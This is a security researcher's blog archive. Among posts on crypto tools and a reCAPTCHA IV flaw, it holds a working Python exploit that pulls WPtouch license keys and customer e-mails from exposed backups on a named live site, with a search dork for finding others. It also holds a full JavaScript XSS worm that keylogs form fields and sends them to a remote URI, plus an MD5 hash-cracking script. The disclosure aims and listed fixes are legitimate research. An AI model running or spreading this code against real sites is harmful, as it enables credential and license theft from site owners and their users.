Archive for the ‘Programming’ Category

0day: Extracting WPtouch Mobile Plugin License Keys

Wednesday, September 24th, 2014

With 6,030,141 downloads, the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers "pro" functionality that users pay for. WPtouch suffers from information disclosure vulnerabilities, and today I'm going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up to and including the current 3.4.10, though I have not bothered to test them all.

Taking a quick peek at the pro functionality, we discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup procedure and read the contents of a backup file with:

unserialize(gzuncompress(base64_decode(file_get_contents($backup_file_name))));

Naturally, that is more or less exactly what wptouch_restore_settings() does. wptouch_backup_settings(), in turn, uses the same wptouch_get_settings() call as everything else that reads WPtouch settings: it calls get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn't prevent directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named 'wptouch-backup-' . date( 'Ymd-His' ) . '.txt', completely accessible to anybody who knows where to look. The wptouch-data and wp-content directories may of course be renamed, so being able to determine their paths is a prerequisite for this to work (dork: inurl:"wptouch-data").

When get_settings() is called by the backup routine it includes the plugin's "BNCID" settings, which in turn contain the customer's configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user's credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up and targeting the least popular site my very limited patience could find:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

# Fetch the directory listing and collect every link target from it
b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

# Download each backup, reverse the storing procedure (base64 -> zlib -> PHP
# unserialize) and pull the e-mail and license key out of the BNCID settings
for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        settings = objs[b"bncid"]._asdict()
        cust_email = settings[b"bncid"].decode("utf-8")
        license_key = settings[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny web access to the WPtouch backup directory and the files it contains
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to back up the license key?)

Solving the browser crypto problem

Sunday, July 14th, 2013

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that a safer web clearly requires asymmetric crypto support in the browser. Porting code to JavaScript is great for users who don't really care about cryptographic strength but only that the data is encrypted somehow. Those people usually believe that they do not need perfect crypto; as long as it is some form of crypto, it is "good enough" for them.

There are many problems with porting cryptographic functions directly to JavaScript, and we see many great ideas fail at doing things properly. JavaScript cryptography is very young compared to established binary solutions, such as GnuPG, that have been audited for a long time. GnuPG has been around since 1999; GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and fewer failures over time, but even when everything has been solved some problems remain by design. Web browsers live in a very hostile world, and we systematically witness XSS vulnerabilities and 0day exploits that enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage is accessed. We can take care of badly implemented cryptography, but we can't take care of the fact that JavaScript-implemented cryptography is accessible to anything that can execute JavaScript in the same environment. As long as cryptography is done in JavaScript this will always be a huge threat.

The users who care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript-implemented cryptography is by design insecure due to the surrounding threats in its domain. These users are actively choosing not to use JavaScript-ported functionality and instead continue to use their local binaries, which have been around and audited for decades longer than newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up, because we are impatient and need something to work as soon as possible, especially in this day and age with the ongoing war against free, unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it which can perform cryptographic operations with non-sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way of doing this, and of successfully integrating it into web browsers, is to run a local webserver that pre-accepted, remotely served content can communicate with. The most important detail is that private keys should never ever be available to the web browser; instead they reside in the local GnuPG keyring, which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd, which I am currently working on supporting in my OpenPGP plugin for Roundcube: rc_openpgpjs. pygpghttpd is an open source, minimalistic HTTPS server written in Python. It exposes an API that makes GnuPG's cryptographic functionality usable from web browsers and any other software that can make HTTP requests. pygpghttpd runs on the client's localhost and allows calling the GnuPG binary from the user's browser securely, without exposing cryptographically sensitive data to hostile environments. It bridges the required elements of GnuPG to HTTP, allowing its cryptographic functionality to be called without the need to trust JavaScript-based PGP/GPG ports. As pygpghttpd calls the local GnuPG binary it also uses the local keyrings and relies on GnuPG entirely for strength. In short, pygpghttpd is just a dummy task router between the browser and the GnuPG binary.

pygpghttpd acts as an HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the "Origin" HTTP header, or the "Referer" header if "Origin" is missing, to find out which domain served the content that is contacting it. It then checks whether the user has added that domain to the "accepted_domains.txt" file, to ensure that it only operates for pre-accepted domains. If the referring domain is accepted it processes the request and serves the result from the local GnuPG binary to the client. The response includes a Cross-Origin Resource Sharing HTTP header to inform the user's browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt, the user's browser forbids the request in accordance with the same-origin security policy.
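
To make the flow concrete, here is a minimal Python sketch of that origin check. It is an illustration under the assumptions above (port 11337, accepted_domains.txt), not the actual pygpghttpd source, and it leaves out TLS and the GnuPG dispatch:

# Minimal sketch of the origin check, NOT the actual pygpghttpd source.
# TLS and the call into the local gpg binary are omitted for brevity.
from http.server import BaseHTTPRequestHandler, HTTPServer

def accepted_domains(path="accepted_domains.txt"):
    # One accepted origin per line, e.g. "https://accepted.domain.com"
    with open(path) as f:
        return set(line.strip().rstrip("/") for line in f if line.strip())

class GpgBridge(BaseHTTPRequestHandler):
    def do_POST(self):
        origin = self.headers.get("Origin") or self.headers.get("Referer", "")
        if origin.rstrip("/") not in accepted_domains():
            # Unknown origin: refuse, and send no CORS header so the browser
            # blocks the response under the same-origin policy as well
            self.send_response(403)
            self.end_headers()
            return
        # ... parse the POSTed cmd and parameters, call the local GnuPG binary ...
        self.send_response(200)
        # The CORS header tells the browser this accepted origin may read the reply
        self.send_header("Access-Control-Allow-Origin", origin)
        self.end_headers()
        self.wfile.write(b"1")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 11337), GpgBridge).serve_forever()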

The HTTPS certificate used by pygpghttpd is self-signed and is not intended to enhance security, since all traffic is isolated to the local network interface. HTTPS is used to ensure that both HTTPS- and HTTP-delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.

For example, generating a keypair with cURL:

curl -k --data "cmd=keygen&type=RSA&length=2048&name=Alice&email=alice@foo.com&passphrase=foobar" -H "Origin: https://accepted.domain.com" https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice\@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project, API documentation and example on Github for full details.

rc_openpgpjs: Ending seven years of Roundcube insecurity

Monday, January 7th, 2013

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and the University of Michigan. Apple Mac OS X 10.7 uses Roundcube by default in its Mail Server. At the time of writing, a lazy Google dork estimates 133 000 public Roundcube installations.

PGP support was first requested seven years ago and marked critical six years ago. It has been actively requested ever since. One of the core developers began developing a PHP implementation, the Enigma plugin, two years ago, but the plugin has not been made functional yet.

Today I am proud to release a beta version of my Roundcube plugin that implements PGP using the OpenPGP.js (based on GPG4Browsers) JavaScript library. rc_openpgpjs runs OpenPGP in the user's browser so that fundamental key storage security isn't immediately broken by design, in contrast to the official Enigma plugin.

At its current beta stage, rc_openpgpjs is able to generate an encryption key pair, save it in HTML5 web storage (in your own browser, guys) and perform encryption and decryption of email. rc_openpgpjs works in any modern browser that can parse HTML5 and supports the window.crypto object. Unfortunately this is limited to Google Chrome today, but Mozilla is working on it.

rc_openpgpjs is available on Github. rc_openpgpjs will become stable as soon as some small glitches have been corrected. It has been written for Roundcube 0.8.4 with the Larry skin.

Introducing TrueCrypt Volume Manager

Saturday, January 5th, 2013

Linux has DM-CRYPT, FreeBSD has GEOM_ELI, and Oracle keeps its ZFS encryption options closed source. The incompatible nature of encrypted storage across various UNIX systems is an obvious problem. TrueCrypt supports most popular platforms, but until now there hasn't been a simple way to organize and maintain TrueCrypt containers across different types of systems. TrueCrypt Volume Manager aims to be that bridge.

TrueCrypt Volume Manager, TCVM for short, is a UNIX shell environment written in Python. It provides a simple CLI shell to create, mount, unmount and list containers, and to change the passphrase of a given encryption container. Since TCVM is intended to run as a UNIX shell, you can securely administer your TrueCrypt containers over SSH.

TCVM can also automatically generate secure passphrases for TrueCrypt containers and store them in a separate container. This feature is entirely optional and is essentially inspired by the KeePass project. Under the hood, TCVM uses a custom wrapper around the TrueCrypt binary.
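
The passphrase generation needs nothing more exotic than the operating system's CSPRNG. A minimal sketch of how such a generator could look (an illustration only, not TCVM's actual code):

# Illustration only, not TCVM's actual code: build a strong random passphrase
# for a TrueCrypt container from the operating system's CSPRNG.
import string
from secrets import choice

def generate_passphrase(length=64):
    # TrueCrypt caps passphrases at 64 printable ASCII characters
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(choice(alphabet) for _ in range(length))

print(generate_passphrase())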

Please note that TCVM is still new and may be slightly rough around the edges. I am happy to fix any issue you may encounter.

The project is available on Github.

Introducing panic_bcast

Thursday, December 13th, 2012

panic_bcast is a decentralized network panic button operating over UDP broadcasts and HTTP. It is intended to act as a panic button in a sensitive network, making it harder to perform cold boot attacks. A serious freedom fighter will run something like it on every node in the network.

How it works

1. An activist has uninvited guests at the door
2. The activist sends the panic signal, a UDP broadcast, with panic_bcast
3. Other machines in the network pick up the panic signal
4. Once panic_bcast has picked up the panic signal it kills truecrypt and powers off the machine.

panic_bcast was written with the intention to support any form of UNIX that can run Python. It has been tested successfully on Linux and FreeBSD.

To trigger the panic signal over HTTP, simply request http://…:8080/panic from any machine that is running panic_bcast; any one of them will do.
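
The broadcast mechanism itself fits in a few lines of Python. The port number and magic payload below are made up for illustration and do not necessarily match what panic_bcast actually uses:

# Illustration of the broadcast mechanism; the port and payload are hypothetical.
import socket
import subprocess

PANIC_PORT = 13377
PANIC_MSG = b"PANIC"

def send_panic():
    # Step 2: broadcast the panic signal to every node on the local subnet
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.sendto(PANIC_MSG, ("255.255.255.255", PANIC_PORT))

def listen():
    # Steps 3-4: pick up the panic signal, kill truecrypt and power off
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("", PANIC_PORT))
    while True:
        data, sender = s.recvfrom(1024)
        if data == PANIC_MSG:
            subprocess.call(["killall", "truecrypt"])
            subprocess.call(["poweroff"])  # "shutdown -p now" on FreeBSD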

Please note that panic_bcast is a beta and more sophisticated ways to prevent cold boot attacks are planned. You can view these plans by searching for the word “TODO” in the source code.

The source code is available on Github.

Remember kids: there’s no home for swap in opsec.

Presenting DNSDH

Thursday, March 29th, 2012

DNSDH is a protocol for exchanging cryptographic keys using the Diffie-Hellman algorithm. Instead of exchanging keys traditionally, the clients speak to a bogus DNS server to initiate an encrypted session in an existing channel of communication. The cryptographically relevant packets travel through a data path that appears to be normal domain name resolution queries, to remain stealthy and effective even behind restricted and surveilled networks. Please understand that the DNS server only pretends to perform name lookups: it speaks the DNS language but performs entirely different tasks.


The bogus DNS server is the center of the key exchange. It uses memcached to store data in memory and deletes any output after it has been delivered to its recipient. The point of DNSDH is to establish a reliable network that enables anything capable of performing a DNS request to exchange cryptographic keys using discreet bogus domain name queries. The communicating nodes, Alice and Bob, could be two cellphones, IRC clients or even death stars. It's also a great blast to teasingly merge cryptographic key exchanges with traffic that is rarely looked at by network administrators unless they want to censor or monitor you.

When initializing the session, Alice first declares the values of p and g and her private key (alice_private), computes her public key (alice_public = g^alice_private mod p) and then queries the bogus DNS server with dnsdhinit.p.g.alice_public. The DNS server creates a sessionid and stores it in memory together with the data provided in Alice's query. Alice tells Bob that she wants to talk privately and sends him a packet containing the sessionid provided by the DNS server. Bob queries the DNS server with the sessionid received from Alice, and the DNS server replies with the information provided in Alice's query. Bob then declares his own private key (bob_private) and calculates his public key: g^bob_private mod p. Bob can now calculate the secret he shares with Alice: alice_public^bob_private mod p. Bob queries the DNS server with dnsdhinit.bob_public, receives an id and sends it to Alice in a packet. Alice then queries the DNS server with that id, receives bob_public and calculates the secret she shares with Bob: bob_public^alice_private mod p.

Alice

$ ./client.example.pl 1337 1338 init
[+] Generating keys...
[+] alice_pub_key: 7
[+] alice_priv_key: 19
[+] Query dnsdhinit.23.5.7
[+] SEND DNSDH_INIT: 6035559
[127.0.0.1:58602]: DNSDH_FINISH: 9300804
[+] Query sessionid.9300804
[+] p: 23
[+] g: 5
[+] bob_public: 1
[+] Shared secret: 1

Bob

$ ./client.example.pl 1338 1337
[127.0.0.1:60267]: DNSDH_INIT: 6035559
[+] Query sessionid.6035559
[+] p: 23
[+] g: 5
[+] alice_public: 7
[+] Generating keys...
[+] bob_pub_key: 1
[+] bob_priv_key: 0
[+] Shared secret: 1
[+] Query dnsdhinit.1
[+] SEND DNSDH_FINISH: 9300804
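
The modular arithmetic in the transcripts is easy to verify with a few lines of Python, using the toy values p = 23 and g = 5 from the example run. Bob's private key below is made up for illustration; the run above happened to generate the degenerate key 0, which is why its shared secret is 1:

# Sanity check of the Diffie-Hellman arithmetic with the toy values above.
p, g = 23, 5

alice_private = 19
alice_public = pow(g, alice_private, p)   # 7, as printed by Alice's client

bob_private = 11                          # hypothetical; the sample run used 0
bob_public = pow(g, bob_private, p)

# Both sides arrive at the same shared secret
assert pow(bob_public, alice_private, p) == pow(alice_public, bob_private, p)
print(alice_public, pow(bob_public, alice_private, p))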

Source code

The source code is available on Github.

Eliminating the myths of XSS attacks

Thursday, December 8th, 2011

In this post I will introduce you to some overlooked uses of an XSS, and also demonstrate how to transform a non-persistent XSS into a persistent one and turn it into an actual practical threat. Cross-site scripting attacks are listed as number two on OWASP's 2010 top 10 list of application security risks, and I wouldn't expect that ranking to drop anytime soon.

The used attack vectors of an XSS are quite simple:

  1. Attacker injects code into data which the server stores and later displays; other users visit the page where the malicious code is rendered and get their cookies stolen.
  2. Attacker injects code into request parameters that the server reflects, and sends the infected URI to the victim user, whose cookie is stolen.
  3. Attacker injects code into request parameters that exploits an unknown web browser vulnerability to install malware on the user's computer; the code is executed by the victim through either vector one or two.
  4. Attacker injects a malicious login form and performs a phishing attack on the victim.

That's pretty much it. When an XSS is demonstrated, persistent or not, a researcher will throw a JavaScript alert() message or inject a cookie stealer. In the eyes of the oblivious developer of the site, your alert() doesn't mean anything. Fake JavaScript page defacements don't mean a thing either. "Oh, you can give me a warning? Good for you." The only time they will act is when your injection can somehow mess up the way the page looks. And not because it's a security risk, but because it's messing up their layout.

Nobody cares about stolen cookies. And why would they? Cookies are not the issue. It's common practice to require re-authentication, such as a password prompt, in addition to session values before changing anything that would require new session values: a new e-mail address, a new password, and so on. In truly sensitive systems cookies should be bound to the user's IP address, and if the attacker has local access to the victim's IP address there are so many attack possibilities that the cookie isn't the victim's biggest problem.

I believe it's safe to assume that the prevalence of unpatched XSS vulnerabilities is due to warnings about nonthreatening threats. "Hey man, check this out. I totally just alert('hax'):ed your site locally in my own browser without affecting anybody!" Nobody is going to take that seriously.

Keep in mind that there's a huge difference between a vulnerable GET parameter and a vulnerable POST parameter. For logical reasons web browsers perform GET requests by default, and maliciously getting a user to submit something with an infected POST parameter is ("should" be) harder than handing them a link.

Broadening the scope of an XSS attack

As a demonstration of what JavaScript is truly capable of when used for malicious purposes, I have written a self-aware virus that infects links and forms (href and action attributes) with its own payload when an infected victim's web browser renders the page. The virus looks for a query parameter containing %3c%73%63%72%69%70%74 (<script) in the query string of a URI and then infects the target destinations with itself, so that it persists for longer than just the one page the user is viewing. It should logically always find at least one occurrence of itself, otherwise it wouldn't execute to begin with.

This way, the virus spreads by transforming a non-persistent XSS injection into a semi-persistent one. It exhibits worm-like behavior; not in the sense of spreading user->user, but page->page. It is, however, user borne if infected links are copied between multiple users. By infecting the action attributes of form elements the infection also survives a login or logout, unless the web server redirects to an uninfected URI.

Wonderfully enough, it's possible to pass any GET parameter with any value you want to an httpd without breaking anything. You could GET http://www.nsa.gov/?bat=man and nothing would break; unhandled parameters are simply ignored. Thus our virus can be very aggressive about infection: the infected victim won't notice a difference either way. It's not uncommon for a vulnerable CMS or MVC to allow the same vulnerable parameter to be passed to any visually rendered part of the site. Remember American Express?

Either way, login credentials are sent to a remote location controlled by the attacker. All form elements are hooked up with a keylogger. By default, the virus makes HTTP requests to a URI controlled by the attacker with the logged information appended, making it show up in logs like GET /username=foo,password=bar. It is very easy to hook it up with additional sniffing, e.g. parsing the rendered website for credit card information.

It's written to be entirely independent of bloated JavaScript libraries and plugins, to keep it as lightweight as possible at execution. It's still an educational proof of concept though, and some bugs are intentionally left unfixed.

// Inject param=payload into target
function inject(target, param, payload)
{
  if(!target.match("\\?"))
    return target + "?" + param + "=" + payload;
  return target + "&" + param + "=" + payload;
}

// Sends data to remote location
function snatch(data)
{
  var i = document.createElement("img");
  i.src = "http://127.0.0.1/" + data;
}

window.onload = function()
{
  window.location.toString().match(/\?(.+)/);
  var query = RegExp.$1.split("&");

  for(i = 0; i < query.length; i++)
  {
    var tmp = query[i].split("=");
    var unescaped = unescape(tmp[1]);
    var payload = "";

    for(x = 0; x < unescaped.length; x++)
      payload += '%' + unescaped.charCodeAt(x).toString(16);

    // Found self
    if(payload.match("%3c%73%63%72%69%70%74"))
    {
      var param = tmp[0];
      break;
    }
  }

  // Infect href elements
  var links = document.getElementsByTagName("a");
  for(i = 0; i < links.length; i++)
    links[i].href = inject(links[i].href, param, payload);

  var forms = document.getElementsByTagName("form");
  for(i = 0; i < forms.length; i++)
  {
    // Infect action elements
    document.forms[i].action = inject(forms[i].action, param, payload);

    // Initialize keylogger
    document.forms[i].onsubmit = function()
    {
      var logged = new Array();
      for(x = 0; x < this.elements.length; x++)
        if(this.elements[x].type != "submit")
          logged[x] = this.elements[x].type + "=" + this.elements[x].value;
      snatch(logged);

      return true;
    }
  }
}

UPDATE: The method of spreading was first introduced in the BeEF framework

BozoCrackPHP

Sunday, November 13th, 2011

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should.

BozoCrack was originally written in Ruby and published on GitHub by juuso. I liked the idea, and figured I’d do a PHP port:

<?php
/**
 * BozoCrack is a depressingly effective MD5 password hash
 * cracker with almost zero CPU/GPU load. Instead of
 * rainbow tables, dictionaries, or brute force, BozoCrack
 * simply finds the plaintext password. Specifically, it
 * googles the MD5 hash and hopes the plaintext appears
 * somewhere on the first page of results.
 *
 * Original BozoCrack can be found on https://github.com/juuso/BozoCrack
 *
 * Ported from Ruby to PHP by Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

if(!isset($_SERVER['argv'][1]))
  die("Usage example: $ php bozocrack.php file_with_md5_hashes.txt\n");

$fileContents = file_get_contents($_SERVER['argv'][1]);
preg_match_all("/\b([a-fA-F0-9]{32})\b/", $fileContents, $hashes);
$hashes = array_unique($hashes[0]);
printf("Loaded %s unique hashes\n", count($hashes));

foreach($hashes as $hash)
{
  $response = file_get_contents("http://www.google.com/search?q={$hash}");
  $wordlist = preg_split("/\s+/", $response);
  foreach($wordlist as $word)
  {
    if($hash == md5($word))
    {
      printf("%s:%s\n", $hash, $word);
      break;
    }
  }
}

robots.txt scanner proof of concept

Friday, October 7th, 2011

Due to the recent scandal of American Express listing their publicly available admin debug panel in their robots.txt file, here’s a sloppy proof of concept that can be used to find similar security issues.

Remember:

  • robots can ignore your /robots.txt. Especially malware robots that scan the web for security vulnerabilities, and email address harvesters used by spammers will pay no attention.
  • the /robots.txt file is a publicly available file. Anyone can see what sections of your server you don’t want robots to use.

http://www.robotstxt.org/robotstxt.html

Either way, a location such as /us/admin/ would be in any wordlist of interesting locations and you should always protect sensitive parts of your system with authorization requirements.

<?php
/**
 * Quick hack to determine HTTP status codes of locations listed in a host's
 * robots.txt file.
 * Author: Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

// Determine HTTP status code of $file on $host
function httpstatus($host, $file) {
   $fp = fsockopen($host,80,$errno,$errstr,30);
   if (!$fp)
      return "connection failed: $errstr ($errno)";
   $out = "GET /$file HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Connection: Close\r\n\r\n";
   fwrite($fp,$out);
   // The first line of the response is the status line, e.g. "HTTP/1.1 200 OK"
   $response = fgets($fp);
   fclose($fp);
   return chop($response);
}

if (!isset($argv[1]))
	die("usage: $ php robotscan.php <host>\n   eg: $ php robotscan.php www.google.com\n");

$host = preg_replace("/\/$/", "", $argv[1]);
$target_url = "http://{$host}/robots.txt";

$filters = array("/[ ]?Allow:[ ]?/",
                 "/[ ]?Disallow:[ ]?/",
                 "/[ ]?Sitemap:.*/",
                 "/[ ]?Request-rate:.*/",
                 "/[ ]?Crawl-delay:.*/",
                 "/[ ]?Visit-time:.*/",
                 "/.*[$*].*/",
                 "/User-agent: .*/",
                 "/#+.*/");

echo "[+] Getting robots.txt content\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$robots = curl_exec($ch);

if(!$robots)
{
	$httpStatus = httpstatus($host, "robots.txt");
	if(preg_match("/200 OK/", $httpStatus))
		die("[-] robots.txt exists but seems empty\n");
	else
		die("[-] {$httpStatus}\n");
}
elseif(preg_match("/([\<])([^\>]+)*([\>])/i", $robots))
	die("[-] robots.txt is incorrectly formatted (html?)\n");
else
{
	$robots = preg_replace($filters, "", $robots);
	$robots = preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $robots);
	$arr = explode("\n", $robots);

	foreach($arr as $loc)
		printf("[+] %s: %s\n", "{$host}{$loc}: ", httpstatus($host, $loc));
}

Erroneous cryptography usage in reCAPTCHA API

Friday, September 2nd, 2011

As a developer you'll definitely stumble upon a lot of ugly code, and sometimes a snippet is just plain "wtf?". I found this one by accident a couple of months ago while browsing through the reCAPTCHA API library developed by Google. First, let's take a quick look at the PHP manual entry for mcrypt_encrypt(), a function introduced by libmcrypt:

string mcrypt_encrypt ( string $cipher , string $key , string $data , string $mode [, string $iv ] )

reCAPTCHA offers a feature called Mailhide that only displays email addresses to users who solve a CAPTCHA (catchy, huh?). The Mailhide part of recaptchalib declares a function called _recaptcha_aes_encrypt(), defined as below:

function _recaptcha_aes_encrypt($val,$ky) {
        if (! function_exists ("mcrypt_encrypt")) {
                die ("To use reCAPTCHA Mailhide, you need to have the mcrypt php module installed.");
        }
        $mode=MCRYPT_MODE_CBC;
        $enc=MCRYPT_RIJNDAEL_128;
        $val=_recaptcha_aes_pad($val);
        return mcrypt_encrypt($enc, $ky, $val, $mode, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
}

As you can see, the initialization vector (the last parameter of mcrypt_encrypt()) used is statically defined as a nullbyte string. If you’ve studied cryptography to some extent you probably know that the entire purpose of the initialization vector is to ensure that the same data encrypted with the same key outputs different ciphertext, just like the purpose of a password salt is to generate different hashes for equal password strings in authentication.
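
The consequence is easy to demonstrate. Here is a small sketch in Python using the pycryptodome library (not the reCAPTCHA code itself): with the fixed all-zero IV, encrypting the same address under the same key always yields the same ciphertext, which is exactly what a dictionary attack needs.

# Demonstration (Python + pycryptodome), not the reCAPTCHA library itself:
# a fixed all-zero IV makes identical plaintexts produce identical ciphertexts.
from Crypto.Cipher import AES

key = b"0123456789abcdef"      # 128-bit key; the actual value is irrelevant here
iv = b"\x00" * 16              # the static IV used by _recaptcha_aes_encrypt()
email = b"user@example.com"    # exactly one 16-byte AES block, so no padding needed

c1 = AES.new(key, AES.MODE_CBC, iv).encrypt(email)
c2 = AES.new(key, AES.MODE_CBC, iv).encrypt(email)
print(c1 == c2)                # True: equal inputs are visible as equal outputs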

By using the \0 IV string Google simply silences the warning that PHP would generate if mcrypt_encrypt() were called using Rijndael in CBC mode without a specified IV, so it is possible that the IV is nothing but a fix for that warning. However, using a static, non-random IV makes the construction susceptible to dictionary attacks. _recaptcha_aes_encrypt() may not be a very important part of the reCAPTCHA API to keep secure, but a very easy solution would be to use another block cipher mode which does not require an initialization vector.